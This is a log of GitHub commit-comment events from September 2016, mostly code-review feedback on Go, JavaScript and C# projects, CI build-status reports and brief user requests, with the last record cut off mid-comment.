{"id":"4500401398","type":"CommitCommentEvent","actor":{"login":"JimBobSquarePants"},"repo":{"name":"cmendible/dotnetcore.samples"},"payload":{"comment":{"id":18857923,"position":5,"line":83,"path":"projectoxford/Program.cs","commit_id":"c7c4d6c69092876222fe4c687242d9698b38cff5","created_at":"2016-09-01T04:24:30Z","updated_at":"2016-09-01T04:24:30Z","body":"`Image` Should be fine. There's a concrete class implementing `Image<Color, uint>` [here](https://github.com/JimBobSquarePants/ImageProcessor/blob/844afef3817a1c28484c508c39d6063022a81a0a/src/ImageProcessorCore/Image.cs). \r\n\r\nBtw. LOVE THIS! :heart: So good to see people experimenting with my work and creating great things. It justifies my work and helps me to believe I'm getting it right."}},"created_at":"2016-09-01T04:24:30Z"}
{"id":"4500403686","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857924,"position":46,"line":45,"path":"pkg/providers/openstack/run_instance.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:25:30Z","updated_at":"2016-09-01T04:25:30Z","body":"Here is again an example of inconsistent error message: saying that it was picking flavor. But the message in L51 explicitly says if failed."}},"created_at":"2016-09-01T04:25:30Z"}
{"id":"4500404508","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"Tee7even/Presents"},"payload":{"comment":{"id":18857926,"position":null,"line":null,"path":null,"commit_id":"007862d2caefb8a54ec5e5b5d9e02d9dc23c5461","created_at":"2016-09-01T04:25:53Z","updated_at":"2016-09-01T04:25:53Z","body":"Hello, please import this to php thanks"}},"created_at":"2016-09-01T04:25:53Z"}
{"id":"4500408341","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"IsantePlus/openmrs-module-patientflags"},"payload":{"comment":{"id":18857934,"position":null,"line":null,"path":null,"commit_id":"87d98c06e9e950399050e54b7393d17263370797","created_at":"2016-09-01T04:27:45Z","updated_at":"2016-09-01T04:27:45Z","body":"You can always add the ticket/issue code into your commit massage and have it describe what you have done in the commit; git commit -m \"ISANT-31: depended on ref-all modules\""}},"created_at":"2016-09-01T04:27:45Z"}
{"id":"4500409677","type":"CommitCommentEvent","actor":{"login":"laploy"},"repo":{"name":"laploy/testGitHub"},"payload":{"comment":{"id":18857937,"position":null,"line":null,"path":null,"commit_id":"1a1dbd6778fe354189ae32d625ac3f633e093b5f","created_at":"2016-09-01T04:28:22Z","updated_at":"2016-09-01T04:28:22Z","body":"hello"}},"created_at":"2016-09-01T04:28:22Z"}
{"id":"4500409864","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857938,"position":78,"line":77,"path":"pkg/providers/openstack/run_instance.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:28:27Z","updated_at":"2016-09-01T04:28:27Z","body":"Do you think other parts of the servers.Server struct will be used in the future.\r\n\r\nIf not, return the Id only."}},"created_at":"2016-09-01T04:28:27Z"}
{"id":"4500410192","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18857940,"position":null,"line":null,"path":null,"commit_id":"fb1cab555eadcbc3f870ac7910a57d5d32f76e2e","created_at":"2016-09-01T04:28:35Z","updated_at":"2016-09-01T04:28:35Z","body":"what I read was that you need to set sdk 24 as your compilation target to use 24. "}},"created_at":"2016-09-01T04:28:35Z"}
{"id":"4500410301","type":"CommitCommentEvent","actor":{"login":"k-joseph"},"repo":{"name":"IsantePlus/openmrs-module-patientflags"},"payload":{"comment":{"id":18857942,"position":null,"line":null,"path":null,"commit_id":"87d98c06e9e950399050e54b7393d17263370797","created_at":"2016-09-01T04:28:38Z","updated_at":"2016-09-01T04:28:38Z","body":"You can always add the ticket/issue code into your commit massage and have it describe what you have done in the commit; git commit -m \"ISANT-31: depended on ref-all modules\""}},"created_at":"2016-09-01T04:28:38Z"}
{"id":"4500414181","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857949,"position":21,"line":20,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:30:23Z","updated_at":"2016-09-01T04:30:23Z","body":"This error seems to be wrong: \"image list for existing image\", but all it does is ListImages (all)."}},"created_at":"2016-09-01T04:30:23Z"}
{"id":"4500414530","type":"CommitCommentEvent","actor":{"login":"chuckrector"},"repo":{"name":"chuckrector/mappo"},"payload":{"comment":{"id":18857950,"position":5,"line":13,"path":"createVerge1MainFntLoader.js","commit_id":"1d8965c5527ade159275361540f2e9ed6ff595b4","created_at":"2016-09-01T04:30:31Z","updated_at":"2016-09-01T04:30:31Z","body":"e.g. createVerge1SmallFntLoader + createVerge1MainFntLoader + createVerge1BoxRawLoader"}},"created_at":"2016-09-01T04:30:31Z"}
{"id":"4500416454","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18857954,"position":12,"line":12,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:31:26Z","updated_at":"2016-09-01T04:31:26Z","body":"Declaring `service` puts it in this function's scope. Put a `var service;` outside of the `beforeEach` block so your `afterEach` works"}},"created_at":"2016-09-01T04:31:26Z"}
{"id":"4500418745","type":"CommitCommentEvent","actor":{"login":"allefeld"},"repo":{"name":"allefeld/htcondor-matlab"},"payload":{"comment":{"id":18857956,"position":null,"line":null,"path":null,"commit_id":"71acc98c54a19bedd6cda2799dbd4df1edc61fae","created_at":"2016-09-01T04:32:29Z","updated_at":"2016-09-01T04:32:29Z","body":"caused by e207609c3b5a86e0a8360835186ea19e8523b354"}},"created_at":"2016-09-01T04:32:29Z"}
{"id":"4500418958","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857957,"position":31,"line":30,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:32:36Z","updated_at":"2016-09-01T04:32:36Z","body":"Checking: is thins sync operation?\r\n\r\nCan it happen, that you will start creating new image in Glance with the code below before it is actually deleted in Glance?"}},"created_at":"2016-09-01T04:32:36Z"}
{"id":"4500420194","type":"CommitCommentEvent","actor":{"login":"strilliams"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":18857961,"position":null,"line":null,"path":null,"commit_id":"4b91faad4fb982b4761f5562bd9e1cb8c39136f6","created_at":"2016-09-01T04:33:12Z","updated_at":"2016-09-01T04:33:12Z","body":"Had the same issue as comment above"}},"created_at":"2016-09-01T04:33:12Z"}
{"id":"4500420442","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857964,"position":50,"line":49,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:33:19Z","updated_at":"2016-09-01T04:33:19Z","body":"Will this print the pass?"}},"created_at":"2016-09-01T04:33:19Z"}
{"id":"4500420631","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18857965,"position":23,"line":23,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:33:24Z","updated_at":"2016-09-01T04:33:24Z","body":"You probably want to check that the response code is 200."}},"created_at":"2016-09-01T04:33:24Z"}
{"id":"4500421104","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18857966,"position":23,"line":23,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:33:37Z","updated_at":"2016-09-01T04:33:37Z","body":"And maybe even check the body"}},"created_at":"2016-09-01T04:33:37Z"}
{"id":"4500424995","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"siddontang/go-mysql"},"payload":{"comment":{"id":18857976,"position":11,"line":266,"path":"replication/row_event.go","commit_id":"5a3273638b17cebd30530fa09e3bc923075245f4","created_at":"2016-09-01T04:35:29Z","updated_at":"2016-09-01T04:35:29Z","body":"Thanks @snaury \r\nHow to fix it? using `len(data) + 1`? \r\nThe main problem that we can't construct a proper case here. can you help me?\r\n"}},"created_at":"2016-09-01T04:35:29Z"}
{"id":"4500425931","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18857978,"position":36,"line":36,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:35:55Z","updated_at":"2016-09-01T04:35:55Z","body":"Every code branch needs to end up calling `done` eventually, otherwise the test will never finish. So use `return done(err);` here."}},"created_at":"2016-09-01T04:35:55Z"}
{"id":"4500427202","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857979,"position":60,"line":59,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:36:30Z","updated_at":"2016-09-01T04:36:30Z","body":"Use MegaByte constant instead of 1024*1024"}},"created_at":"2016-09-01T04:36:30Z"}
{"id":"4500427361","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-landingpage"},"payload":{"comment":{"id":18857980,"position":14,"line":14,"path":"Assignment 2/starter_code/js/index.js","commit_id":"a8d1a110644c32cb5232820bb4af49b089f4a805","created_at":"2016-09-01T04:36:35Z","updated_at":"2016-09-01T04:36:35Z","body":"What you are trying to prevent here is the page jumping to the top when you click a link, so what you are preventing is the default action of the click. To do this, you should write the `event.preventDefault()` within the the callback of each click handler like so:\r\n```\r\n$(\"#readArticle1\").click(revealArticle1);\r\n\r\nfunction revealArticle1(){\r\n  event.preventDefault();\r\n  // rest of the functionality here\r\n}\r\n```"}},"created_at":"2016-09-01T04:36:35Z"}
{"id":"4500428089","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18857983,"position":8,"line":8,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:36:57Z","updated_at":"2016-09-01T04:36:57Z","body":"Install the eslint plugin and try to make it happy."}},"created_at":"2016-09-01T04:36:57Z"}
{"id":"4500428354","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-landingpage"},"payload":{"comment":{"id":18857984,"position":null,"line":null,"path":null,"commit_id":"a8d1a110644c32cb5232820bb4af49b089f4a805","created_at":"2016-09-01T04:37:06Z","updated_at":"2016-09-01T04:37:06Z","body":"You did a fantastic job pseudo coding this and breaking it into manageable steps. Well done!"}},"created_at":"2016-09-01T04:37:06Z"}
{"id":"4500428891","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857985,"position":152,"line":151,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:37:20Z","updated_at":"2016-09-01T04:37:20Z","body":"Do you need it exported?"}},"created_at":"2016-09-01T04:37:20Z"}
{"id":"4500430442","type":"CommitCommentEvent","actor":{"login":"Pjeter"},"repo":{"name":"Pjeter/esporks"},"payload":{"comment":{"id":18857988,"position":null,"line":null,"path":null,"commit_id":"bd04a59a67c3fe3bad1ed152f293c2a72e078e88","created_at":"2016-09-01T04:38:03Z","updated_at":"2016-09-01T04:38:03Z","body":"fixed spelling"}},"created_at":"2016-09-01T04:38:03Z"}
{"id":"4500432851","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18857991,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T04:39:01Z","updated_at":"2016-09-01T04:39:01Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-01T04:39:01Z"}
{"id":"4500432989","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"picons/picons-source"},"payload":{"comment":{"id":18857993,"position":null,"line":null,"path":null,"commit_id":"4d0e949b1ca0fd04b302f5cc7aefb9968a39a639","created_at":"2016-09-01T04:39:06Z","updated_at":"2016-09-01T04:39:06Z","body":"Any chance of a \"Sky Star Wars\" please?\r\n\r\nUsing 1612_7DC_2_11A0000"}},"created_at":"2016-09-01T04:39:06Z"}
{"id":"4500433248","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857995,"position":181,"line":180,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:39:13Z","updated_at":"2016-09-01T04:39:13Z","body":"Use logrus"}},"created_at":"2016-09-01T04:39:13Z"}
{"id":"4500433283","type":"CommitCommentEvent","actor":{"login":"lochstar"},"repo":{"name":"okonet/react-dropzone"},"payload":{"comment":{"id":18857996,"position":null,"line":null,"path":null,"commit_id":"9587502c6b3bb15d0f823039a0695ef9206ed90e","created_at":"2016-09-01T04:39:14Z","updated_at":"2016-09-01T04:39:14Z","body":"Thanks for this! Can you publish a new update to npm?"}},"created_at":"2016-09-01T04:39:14Z"}
{"id":"4500434176","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-landingpage"},"payload":{"comment":{"id":18857997,"position":7,"line":7,"path":"Assignment 2/starter_code/js/index.js","commit_id":"a8d1a110644c32cb5232820bb4af49b089f4a805","created_at":"2016-09-01T04:39:40Z","updated_at":"2016-09-01T04:39:40Z","body":"Great job thinking about how to hide elements. Next time perhaps try doing this in CSS. When you do it in the $.ready() function the DOM is fully loading and then you are hiding it. Since we want it hidden on load, you may think about a CSS class 'none' with display: none; that you can apply to all the elements you want hidden by default."}},"created_at":"2016-09-01T04:39:40Z"}
{"id":"4500434351","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18857998,"position":185,"line":184,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:39:45Z","updated_at":"2016-09-01T04:39:45Z","body":"Use logrus. Also, is it safe to continue if err occurs?"}},"created_at":"2016-09-01T04:39:45Z"}
{"id":"4500434614","type":"CommitCommentEvent","actor":{"login":"Jaquier"},"repo":{"name":"Microsoft/CNTK"},"payload":{"comment":{"id":18858001,"position":null,"line":null,"path":null,"commit_id":"85f4bf6c74fb75e4d916b7e1fdecc1dc89ff1802","created_at":"2016-09-01T04:39:53Z","updated_at":"2016-09-01T04:39:53Z","body":"Dear, friend,\r\n       I run the AutoEncoder model in linux ,but I have a different results.\r\n       The last  is  MeanSqerr.MSE = 155.274163*1124823, while your last is 34.2134*1124823!\r\n       I have checked the  TIMIT_TrainLSTM.cntk , no difference, so I want to  know did you modify the ae.ndl      file ?\r\n       Wish for your answers, or you  can give a mail to me ,my mail jiejia1106@sina.com\r\n"}},"created_at":"2016-09-01T04:39:53Z"}
{"id":"4500435324","type":"CommitCommentEvent","actor":{"login":"Requst"},"repo":{"name":"Requst/hello-world"},"payload":{"comment":{"id":18858003,"position":null,"line":null,"path":null,"commit_id":"be9f5bf1e06dc249664a9262db834e7d7f828ebc","created_at":"2016-09-01T04:40:12Z","updated_at":"2016-09-01T04:40:12Z","body":"de"}},"created_at":"2016-09-01T04:40:12Z"}
{"id":"4500437596","type":"CommitCommentEvent","actor":{"login":"gberginc"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18858006,"position":14,"line":135,"path":"pkg/types/types.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-01T04:41:08Z","updated_at":"2016-09-01T04:41:08Z","body":"Since you have this in MB, I suggest you keep int. I think max int is 2.147.483.647 which should be enough for today disk sizes."}},"created_at":"2016-09-01T04:41:08Z"}
{"id":"4500438022","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18858007,"position":82,"line":82,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:41:19Z","updated_at":"2016-09-01T04:41:19Z","body":"Maybe what we really want to be checking here is not just that it errors, but that the service then doesn't emit any events."}},"created_at":"2016-09-01T04:41:19Z"}
{"id":"4500440644","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18858012,"position":30,"line":30,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:42:28Z","updated_at":"2016-09-01T04:42:28Z","body":"Look at some of the other tests (e.g. `lib.api.v1.report-controller.test.js`) for a nicer request syntax."}},"created_at":"2016-09-01T04:42:28Z"}
{"id":"4500442173","type":"CommitCommentEvent","actor":{"login":"reme-dy"},"repo":{"name":"kvangent/PokeAlarmWiki"},"payload":{"comment":{"id":18858014,"position":null,"line":null,"path":null,"commit_id":"75030154438774108e569dd0e4e213d40521adbd","created_at":"2016-09-01T04:43:13Z","updated_at":"2016-09-01T04:43:13Z","body":"Markdown Preview Plus doesn't handle the double `))` correctly.  Text originally looked correct in MPP but doesn't render in github flavor markdown."}},"created_at":"2016-09-01T04:43:13Z"}
{"id":"4500442222","type":"CommitCommentEvent","actor":{"login":"sigsegv-mvm"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18858015,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-01T04:43:15Z","updated_at":"2016-09-01T04:43:15Z","body":"@sgtaziz Even if it's just re-hosted for a few days so everyone can log in and export their lists, and then the site goes back down for good, that would probably satisfy what a lot of people want."}},"created_at":"2016-09-01T04:43:15Z"}
{"id":"4500442455","type":"CommitCommentEvent","actor":{"login":"pina247"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":18858016,"position":8,"line":4,"path":"CONTRIBUTING.md","commit_id":"c9716ce6c22d4bc296cf3e948daa070ad968e537","created_at":"2016-09-01T04:43:22Z","updated_at":"2016-09-01T04:43:22Z","body":"Tracker. Not working right. OK your system. Is a referred as redirect system."}},"created_at":"2016-09-01T04:43:22Z"}
{"id":"4500443416","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-landingpage"},"payload":{"comment":{"id":18858020,"position":null,"line":null,"path":null,"commit_id":"a8d1a110644c32cb5232820bb4af49b089f4a805","created_at":"2016-09-01T04:43:47Z","updated_at":"2016-09-01T04:43:47Z","body":"You did a great job tackling this from scratch. One thing to think about for next time is using classes instead of ids to reduce the amount of code you need to write. For example, instead of writing an id #readArticle1and #readArticle2 you can try a class .readArticle, and then you only need to have one event handler. If you use classes you could have as many blog posts as you want and they can all use the same function. Again, great job!"}},"created_at":"2016-09-01T04:43:47Z"}
{"id":"4500443947","type":"CommitCommentEvent","actor":{"login":"andresfib"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18858021,"position":12,"line":12,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:44:01Z","updated_at":"2016-09-01T04:44:01Z","body":"In my view, SMSGhContentService should receive the endpoint (e.g. 'ghanaelections', which will be attached to 'http://localhost:1111' so that the server actually listens to 'http://localhost:1111/ghanaelections'. That way we could have several SMSGh sources."}},"created_at":"2016-09-01T04:44:01Z"}
{"id":"4500443988","type":"CommitCommentEvent","actor":{"login":"KjellKod"},"repo":{"name":"LogRhythm/StopWatch"},"payload":{"comment":{"id":18858023,"position":null,"line":null,"path":null,"commit_id":"4297069c2f7d4594cca864249a0ca365489c1192","created_at":"2016-09-01T04:44:02Z","updated_at":"2016-09-01T04:44:02Z","body":"👍 "}},"created_at":"2016-09-01T04:44:02Z"}
{"id":"4500447497","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18858031,"position":null,"line":null,"path":null,"commit_id":"3aab6bba762404edeb784a847d8474b184b584ae","created_at":"2016-09-01T04:45:28Z","updated_at":"2016-09-01T04:45:28Z","body":"I think we'd rather not have this commit hanging around. You can use `git rebase -i develop` carefully to clean it up."}},"created_at":"2016-09-01T04:45:28Z"}
{"id":"4500451334","type":"CommitCommentEvent","actor":{"login":"andresfib"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18858045,"position":60,"line":60,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"b62cb3c1f8416979e1483ac4429f34c51e0eee05","created_at":"2016-09-01T04:47:12Z","updated_at":"2016-09-01T04:47:12Z","body":"you should send another request here, for the service to emit the report event."}},"created_at":"2016-09-01T04:47:12Z"}
{"id":"4500452045","type":"CommitCommentEvent","actor":{"login":"pina247"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":18858046,"position":3,"line":3,"path":"w3c.json","commit_id":"c9716ce6c22d4bc296cf3e948daa070ad968e537","created_at":"2016-09-01T04:47:32Z","updated_at":"2016-09-01T04:47:32Z","body":"OK what is not working systems all code or just the new one of \"XHTML 5 \" if you don't update profile and then when you are verified. This program well work.?"}},"created_at":"2016-09-01T04:47:32Z"}
{"id":"4500454077","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":18858050,"position":38,"line":57,"path":"test/lib.fetching.content-services.smsgh-content-service.test.js","commit_id":"299e6bd15b541c9162c484a4bce1ca1d9190d6c2","created_at":"2016-09-01T04:48:25Z","updated_at":"2016-09-01T04:48:25Z","body":"I'm not sure what this object should look like, and I think you'll figure it out as you go, but I would expect that we'd want to keep sending similar objects to what the other content services are sending (i.e. `authoredAt` instead of `Date`)."}},"created_at":"2016-09-01T04:48:25Z"}
{"id":"4500459008","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858059,"position":null,"line":null,"path":null,"commit_id":"34cf667ef26cea90003b336fbb2fbf9e2580bbee","created_at":"2016-09-01T04:50:32Z","updated_at":"2016-09-01T04:50:32Z","body":"113835831-Source-Temp-Not-Reporting (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34cf667ef26cea90003b336fbb2fbf9e2580bbee-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-01T04:50:32Z"}
{"id":"4500459794","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858060,"position":null,"line":null,"path":null,"commit_id":"9171e18f2967a9351a88611534429cbf6c3d1a71","created_at":"2016-09-01T04:50:51Z","updated_at":"2016-09-01T04:50:51Z","body":"Related to: backdrop/backdrop-issues#2042 "}},"created_at":"2016-09-01T04:50:51Z"}
{"id":"4500459801","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858061,"position":null,"line":null,"path":null,"commit_id":"b3b7017fa93e6fe8480b002ee56cca9af7af7ec4","created_at":"2016-09-01T04:50:51Z","updated_at":"2016-09-01T04:50:51Z","body":"Related to: backdrop/backdrop-issues#2042 "}},"created_at":"2016-09-01T04:50:51Z"}
{"id":"4500459808","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18858062,"position":null,"line":null,"path":null,"commit_id":"b08568998036970dfb695ea4f6d4187842f11efd","created_at":"2016-09-01T04:50:52Z","updated_at":"2016-09-01T04:50:52Z","body":"Related to: backdrop/backdrop-issues#2042 "}},"created_at":"2016-09-01T04:50:52Z"}
{"id":"4500461946","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18858068,"position":null,"line":null,"path":null,"commit_id":"5b5301a77f83c06a293b4a4d648dc799f7bbe3e5","created_at":"2016-09-01T04:51:44Z","updated_at":"2016-09-01T04:51:44Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b5301a77f83c06a293b4a4d648dc799f7bbe3e5-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-01T04:51:44Z"}
{"id":"4500462721","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18858070,"position":null,"line":null,"path":null,"commit_id":"788a32b0aa655831e334f3d3b5cbe08e6f3f7cbe","created_at":"2016-09-01T04:52:05Z","updated_at":"2016-09-01T04:52:05Z","body":"Thanks!\n\nP. S STC will pass because it is practically a non functional change.\n\n\nOn Thursday, September 1, 2016, Stefano Cardanobile <\nnotifications@github.com> wrote:\n\n> I Marco, I would let the stc test run to completion, just to have the\n> results documented. I will not go for LTC and will not open a PR. It looks\n> like it will fail anyway.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Stefano80/Stockfish/commit/788a32b0aa655831e334f3d3b5cbe08e6f3f7cbe#commitcomment-18857446>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAYQ2gQxvQJaIft4rOsQms1JWjweUks5qlkmwgaJpZM4Jx9Tz>\n> .\n>\n"}},"created_at":"2016-09-01T04:52:05Z"}
{"id":"4500463130","type":"CommitCommentEvent","actor":{"login":"JFDaly"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18858073,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T04:52:16Z","updated_at":"2016-09-01T04:52:16Z","body":"Well, its conceivable that someone might want an improvement (a UI for instance) that gives a negative promotion to enemy units ending their turn on them. I don't have such an effect, but the functionality might be useful for someone regardless. Whether or not that's worth any potential overhead is for you to determine.\r\n\r\nViz. these changes (**bold** marked as issues)\r\n\r\n1) The improvement change won't have any affect on me.\r\n2) Attrition system is fixed and in working order.\r\n3) CityPuppeted() works perfectly.\r\n**4)** GetNumTotalBuildings() works, but I was hoping for it to skip National Wonders, World Wonders, and dummy Buildings. Basically, exactly like GetNumBuildings(), but including free Buildings. If this isn't possible, it's no problem.\r\n5) Ah, for some reason my function had ContractStarted(playerID, contractID, contractUnitID, contractDuration, contractMaintenance). My bad, is working.\r\n**6)** EndContract() caused the game to CTD.\r\n**7)** Haven't been able to test PlayerHasContract because of the above.\r\n8) Contract turns now persists on re-load successfully.\r\n**9)** ChangeContractTurns() doesn't work as intended. Not sure of the pattern (if there is one), but, for instance, I use ChangeContractTurns(ID, 1), and GetContractTurnsRemaining(ID) 